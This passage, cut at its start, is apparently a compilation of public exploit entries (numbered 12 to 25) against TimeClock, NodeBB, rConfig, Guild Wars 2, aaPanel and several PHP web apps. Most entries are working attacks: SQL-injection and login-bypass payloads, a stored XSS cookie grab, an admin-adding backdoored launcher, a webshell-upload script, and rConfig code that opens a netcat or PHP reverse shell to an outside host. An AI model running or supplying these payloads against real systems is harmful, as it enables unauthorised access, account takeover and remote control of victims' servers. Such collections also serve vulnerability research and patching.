     The user name could not be found

     #7. Reboot the Computer
     C:\Program Files (x86)\Battle.net> shutdown /r

     #8. Login & look at that new Admin
     C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full"
     User name                    placebo
     Local Group Memberships      *Administrators      *Users
     Global Group memberships     *None
  12. #!/usr/bin/python3
     # Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
     # Date: July 21, 2020
     # Exploit Author: François Bibeau
     # Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
     # Vendor Homepage: http://timeclock-software.net/
     # Software Link: http://timeclock-software.net/timeclock-download.php
     # Version: 1.01
     # Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache

     import time
     import requests

     login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
     login_data = {'username':'fred','password':'fred','submit':'Log In'}
     headers = {'User-Agent': 'Mozilla/5.0'}

     # init session & login
     session = requests.Session()
     session.post(login_url,headers=headers,data=login_data)

     # static list provided for PoC, could use a text file
     users = ['john','bill','tim','fred','garry','sid','admin']

     for user in users:
         url = "http://159.203.41.34/add_entry.php"
         payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
         data = {'data_month': '1', 'data_day': '1', 'data_year': '1', 'type_id': '5', 'hours': '1', 'notes': payload, 'submit': 'Add'}
         print(f'Checking user {user}... ', end = '')
         start = time.time()
         response = session.post(url,data=data)
         end = time.time()
         delay = end - start
         if delay > 5:
             print('User found!')
         else:
             print('')
  13. # Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover
     # Date: 2020-08-18
     # Exploit Author: Muhammed Eren Uygun
     # Vendor Homepage: https://nodebb.org/
     # Software Link: https://github.com/NodeBB/NodeBB
     # Version: 1.12.2-1.14.2
     # Tested on: Linux
     # CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7

     Impact:
     ----------------------
     A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event via an account takeover.

     Bug PoC:
     ----------------------
     Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4

     1- Create a user
     2- Go to the password change page
     3- Change the password with a proxy in place:
        427["user.changePassword",{"currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5}]
     4- Replace the uid in the request with 1, which is the uid value of the admin user, and send the request.
     5- You can now log in to the admin user with this password.
  14. # Exploit Title: rConfig 3.9.5 - Remote Code Execution (Unauthenticated)
     # Google Dork: N/A
     # Date: 2020-10-13
     # Exploit Author: Daniel Monzón (stark0de)
     # Vendor Homepage: https://www.rconfig.com/
     # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.5.zip
     # Version: rConfig v3.9.5
     # Tested on: CentOS 7 x64
     # CVE : N/A

     import requests
     from requests_toolbelt.multipart.encoder import MultipartEncoder
     import urllib3
     import re
     #from bs4 import BeautifulSoup

     urllib3.disable_warnings()

     url="https://x.x.x.x/" #change this to fit your URL (adding the last slash)
     payload="nc y.y.y.y 9001 -e /bin/sh" #change this to whatever payload you want
     payload_rce= "fileName=../www/test.php&code=<%3fphp+echo+system('ls')%3b%3f>&id=3" #if you want to use Method 2 for RCE, use a PHP, urlencoded payload as the value of the code parameter

     print("Connecting to: {}".format(url))
     print("Connect back is set to: {}, please launch 'nc -lv 9001'".format(payload))

     x = requests.get(url+"login.php", verify=False)
     version = re.search("<p>(.*)<span>", x.text)
     version = version.group(1)
     if version == "rConfig Version 3.9.5":
         print("Version 3.9.5 confirmed")
     else:
         print("Version is "+version+ " it may not be vulnerable")

     payload_final=";"+payload
     referer=url+"useradmin.php"
     origin=url
     proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} #in case you need to debug the exploit with Burp, add ', proxies=proxies' to any request

     def createuser():
         multipart_data = MultipartEncoder(
             fields={
                 'username': 'test',
                 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol
                 'passconf': 'Testing1@',
                 'email': '[email protected]',
                 'ulevelid': '9',
                 'add': 'add',
                 'editid': ''
             }
         )
         headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin}
         cookies = {'PHPSESSID': 'test'}
         response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)
         if "error" not in response.text:
             print("(+) User test created")
         else:
             print("(-) User couldn't be created, please debug the exploit")

     def exploit():
         payload = {
             'user': 'test',
             'pass': 'Testing1@',
             'sublogin': '1'
         }
         with requests.Session() as s:
             p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False)
             if "Stephen Stack" in p.text:
                 print("(-) Exploit failed, could not login as user test")
             else:
                 print("(+) Log in as test completed")
             params = {'path':'test', 'ext': payload_final }
             rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params)
             if "success" in rce.text:
                 print("(+) Payload executed successfully")
             else:
                 print("(-) Error when executing payload, please debug the exploit") #if you used method 2 to auth bypass and 1 for RCE, ignore this message

         payload = {
             'user': 'admin',
             'pass': 'Testing1@',
             'sublogin': '1'
         }
         with requests.Session() as s:
             p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False)
             if "Stephen Stack" in p.text:
                 print("(-) Exploit failed, could not login as user test")
             else:
                 print("(+) Log in as test completed")
             params = {'path':'test', 'ext': payload_final }
             rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params)
             if "success" in rce.text:
                 print("(+) Payload executed successfully")
             else:
                 print("(-) Error when executing payload, please debug the exploit")

     def user_enum_update():
         users=requests.get(url+'useradmin.inc.php', verify=False)
         #matchObj = re.findall(r'<td align="center">(.*?)</td>', users.text, re.M|re.I|re.S)
         if "admin" in users.text:
             print("(+) The admin user is present in this rConfig instance")
             multipart_data = MultipartEncoder(
                 fields={
                     'username': 'admin',
                     'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol
                     'passconf': 'Testing1@',
                     'email': '[email protected]',
                     'ulevelid': '9',
                     'add': 'add',
                     'editid': '1' #you may need to increment this if you want to reset the password of a different user
                 }
             )
             headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin}
             cookies = {'PHPSESSID': 'test'}
             response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)
             if "error" not in response.text:
                 print("(+) The new password for the admin user is Testing1@")
             else:
                 print("(-) Admin user couldn't be edited, please debug the exploit")
         elif "Admin" in users.text:
             print("(+) There is at least one Admin user, check "+ str(url)+"useradmin.inc.php manually and modify the exploit accordingly (erase the if-elif statements of this function and modify the user payload)")

     def template():
         payload = {
             'user': 'admin',
             'pass': 'Testing1@',
             'sublogin': '1'
         }
         #<%3fphp+%24sock%3Dfsockopen%28%22192.168.1.13%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%3f>
         headers_rce = {'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8", "Referer": url+"deviceConnTemplates.php", "Origin":origin, "X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.5"}
         with requests.Session() as s:
             p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False)
             if "Stephen Stack" in p.text:
                 print("(-) Exploit failed, could not login as user test")
             else:
                 print("(+) Log in as admin completed")
             rce=s.post(url+'lib/ajaxHandlers/ajaxEditTemplate.php', verify=False, data=payload_rce, headers=headers_rce)
             if "success" in rce.text:
                 print("(+) File created")
                 rce_req = s.get(url+'test.php.yml', verify=False)
                 print("(+) Command results: ")
                 print(rce_req.text)
             else:
                 print("(-) Error when executing payload, please debug the exploit")

     def main():
         print("Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón")
         print("In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)")
         print("Note: preferred method for auth bypass is 1, because it is less 'invasive'")
         print("Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine")
         print('''Choose method for authentication bypass:
         1) User creation
         2) User enumeration + User edit
         ''')
         auth_bypass=str(input("Method>"))
         if auth_bypass == "1":
             createuser()
         elif auth_bypass == "2":
             user_enum_update()
         print('''Choose method for RCE:
         1) Unsafe call to exec()
         2) Template edit
         ''')
         rce_method=str(input("Method>"))
         if rce_method == "1":
             exploit()
         elif rce_method == "2":
             template()

     main()
  15. # Exploit Title: Guild Wars 2 - Insecure Folder Permissions
     # Date: 2020-10-09
     # Exploit Author: George Tsimpidas
     # Software Link : https://account.arena.net/welcome
     # Version Build : 106915
     # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
     # Category: local

     Vulnerability Description:
     Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user who can replace the executable file with a binary of choice. The vulnerability exists due to improper permissions, with the 'F' flag (Full) for the 'Everyone' group, making the entire 'Guild Wars 2' directory and its files and sub-dirs world-writable.

     # Local Privilege Escalation Proof of Concept

     ## Insecure Folder Permission
     D:\>icacls "Guild Wars 2"
     Guild Wars 2 Everyone:(F)
                  Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC)
                  BUILTIN\Administrators:(I)(F)
                  BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                  NT AUTHORITY\Authenticated Users:(I)(M)
                  NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                  BUILTIN\Users:(I)(RX)
                  BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)

     ## Insecure File Permission
     D:\Guild Wars 2>icacls Gw2-64.exe
     Gw2-64.exe Everyone:(F)
                Everyone:(I)(F)
                BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                NT AUTHORITY\Authenticated Users:(I)(M)
                BUILTIN\Users:(I)(RX)

     #0. Download & install

     #1. Create low privileged user & change to the user
     ## As admin
     C:\>net user lowpriv Password123! /add
     C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
     User name                    lowpriv
     Local Group Memberships      *Users
     Global Group memberships     *None

     #2. Move the Service EXE to a new name
     D:\Guild Wars 2>whoami
     lowpriv
     D:\Guild Wars 2>move Gw2-64.exe Gw2-64.frey.exe
             1 file(s) moved.

     #3. Create malicious binary on kali linux
     ## Add Admin User C Code
     kali# cat addAdmin.c
     int main(void){
         system("net user placebo mypassword /add");
         system("net localgroup Administrators placebo /add");
         WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0);
         return 0;
     }

     ## Compile Code
     kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe

     #4. Transfer the created 'Gw2-64.exe' to the Windows Host

     #5. Move the created 'Gw2-64.exe' binary to the 'D:\Guild Wars 2' Folder
     D:\Guild Wars 2>move C:\Users\lowpriv\Downloads\Gw2-64.exe .

     #6. Check that the exploit admin user doesn't exist
     D:\Guild Wars 2>net user placebo
     The user name could not be found

     #7. Reboot the Computer
     D:\Guild Wars 2>shutdown /r

     #8. Login & now start the Guild Wars 2 Game; the backdoored launcher will be executed, and the user placebo will be created and added to the Administrators group.
     C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full"
     User name                    placebo
     Local Group Memberships      *Administrators      *Users
     Global Group memberships     *None
  16. # Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-10-14
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A

# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : /login.php

# Parameter & Payload:
username: '=''or'@email.com
password: '=''or'

# Proof of Concept:
http://localhost/lagos-parker/login.php

POST /lagos-parker/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Referer: http://localhost/lagos-parker/login.php
Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8
Connection: keep-alive
Upgrade-Insecure-Requests: 1

email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=
  17. # Exploit Title: Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass
# Date: 24/09/2020
# Exploit Author: Saurav Shukla & Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14461/simple-grocery-store-sales-and-inventory-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sales-inventory-system-using-php.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/sales_inventory/login.php
Step 2: use payload jyot' or 1=1# in user and password field

Malicious Request:::

POST /sales_inventory/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://localhost
Connection: close
Referer: http://localhost/sales_inventory/login.php
Cookie: PHPSESSID=hdk9npcmq341ulcsn8cj6oefov

username=jyot'+or+1%3d1%23&password=jyot'+or+1%3D1%23
  18. #Exploit Title: Employee Management System 1.0 - Stored Cross Site Scripting
#Date: 2020-10-16
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
#Version: 1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::

Step 1: Open the URL localhost:8081/Employee Management System/addemp.php
Step 2: Use payload <img src=x onerror=alert(document.cookie)> in First Name and Last Name.

Malicious Request:::

POST /Employee%20Management%20System/////process/addempprocess.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3267707159765331982713791736
Content-Length: 1571
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Employee%20Management%20System/////addemp.php
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
Upgrade-Insecure-Requests: 1

-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="firstName"

<img src=x onerror=alert(document.cookie)>
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="lastName"

<img src=x onerror=alert(document.cookie)>
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="birthday"

2020-09-28
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="gender"

Female
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="contact"

9876543211
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="nid"

12
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="address"

Gujarat
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="dept"

CS
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="degree"

BE
-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="salary"


-----------------------------3267707159765331982713791736
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------3267707159765331982713791736--

Cookie will be reflected on View Employee.
  19. # Exploit Title: Zoo Management System 1.0 - Authentication Bypass
# Date: 02/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=12723
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost/zoo/zms/admin/index.php
Step 2: use payload jyot' or 1=1# in user and password field

Malicious Request

POST /zoo/zms/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://localhost
Connection: close
Referer: http://localhost/zoo/zms/admin/index.php
Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p
Upgrade-Insecure-Requests: 1

username=jyot%27+or+1%3D1+%23&password=jyot%27+or+1%3D1+%23&login=

Step 3: You will be logged in as admin.
  20. #Exploit Title: Employee Management System 1.0 - Authentication Bypass
#Date: 2020-10-16
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
#Version: 1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::

Step 1: Open the URL http://localhost:8081/Employee%20Management%20System/alogin.html
Step 2: Use payload anki' or 1=1# for both username and password.

Malicious Request:::

POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
Upgrade-Insecure-Requests: 1

mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login

You will be logged in as Admin of the application.
  21. # Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
# Date: 16/10/2020
# Exploit Author: Oğuz Türkgenç
# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3

Step 1: Open the URL http://localhost/cvms/index.php
Step 2: use payload ot' or 1=1# in user and password field

Malicious Request

POST /cvms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.175.128/cvms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost
Connection: close
Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660
Upgrade-Insecure-Requests: 1

username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login=

Step 3: You will be logged in as admin.
  22. #Exploit Title: Alumni Management System 1.0 - Authentication Bypass
#Date: 2020-10-16
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/alumni-management-system.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::

Step 1: Open the URL http://localhost:8081/alumni-management-system/alumni/admin/login.php
Step 2: use payload anki' or 1=1# for both username and password.

Malicious Request:::

POST /alumni-management-system/alumni/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/alumni-management-system/alumni/admin/login.php
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv

username=anki'+or+1%3D1%23&password=anki'+or+1%3D1%23

You will be logged in as admin of the application.
  23. # Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation]
# Google Dork: []
# Date: [04.05.2020]
# Exploit Author: [Ünsal Furkan Harani (Zemarkhos)]
# Vendor Homepage: https://www.aapanel.com/
# Software Link: https://github.com/aaPanel/aaPanel
# Version: [6.6.6] (REQUIRED)
# Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux]
# CVE : [CVE-2020-14421]

If you are logged in as admin:

1- go to the crontab
2- select shell script and paste your reverse shell code
3- click execute button and you are now root, because crontab.py is running with root privileges.

Remote Code Execution
https://github.com/jenaye/aapanel
  24. # Exploit Title: Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)
# Date: 2020-10-05
# Exploit Author: b1nary
# Vendor Homepage: https://www.sourcecodester.com/php/14482/restaurant-reservation-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/restaurants_3.zip
# Version: 1.0
# Tested on: Linux + Apache2

------------------------------------------------------------------------------------

1. Description:
----------------------

Restaurant Reservation System 1.0 allows SQL Injection via parameter 'date' in includes/reservation.inc.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------

In Burpsuite intercept the request from the affected page with 'date' parameter and save it like re.req. Then run SQLmap to extract the data from the database:

sqlmap -r re.req --dbms=mysql

3. Example payload:
----------------------

(time-based blind)
fname=user&lname=user&date=2020-10-14' AND (SELECT 1934 FROM (SELECT(SLEEP(5)))lmWi) AND 'navS'='navS&time=16:00 - 20:00&num_guests=2&tele=123456789&comments=null&reserv-submit=

4. Burpsuite request:
----------------------

POST /restaurant/includes/reservation.inc.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/restaurant/reservation.php
Cookie: PHPSESSID=r355njdkuddu4ac0a784i9i69m
Upgrade-Insecure-Requests: 1

fname=user&lname=user&date=2020-10-14&time=16%3A00+-+20%3A00&num_guests=2&tele=123456789&comments=null&reserv-submit=
  25. # Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# Exploit Tested Using: Python 2.7.18
# CVE: CVE-2020-25763

# Vulnerability Description:
# Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files.

import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string

def print_usage(STRING):
    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
        print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
        sys.exit(-1)

    SERVER_URL = sys.argv[1]
    UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
    UPLOAD_URL = SERVER_URL + UPLOAD_DIR

    random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)])
    webshell = random+'.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)

    image = {
        'cover': (
            webshell,
            '<?php echo shell_exec($_GET["d3crypt"]); ?>',
            'application/php',
            {'Content-Disposition': 'form-data'}
        )
    }
    fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}

    r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)

    r2 = s.get(SERVER_URL, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)

    def get_links(tree):
        refs = tree.xpath("//img")
        links = [link.get('src', '') for link in refs]
        return [l for l in links]

    links = get_links(tree)

    print('Access your webshell at: ')
    for link in links:
        if webshell in link:
            print(SERVER_URL + link+'?d3crypt=whoami')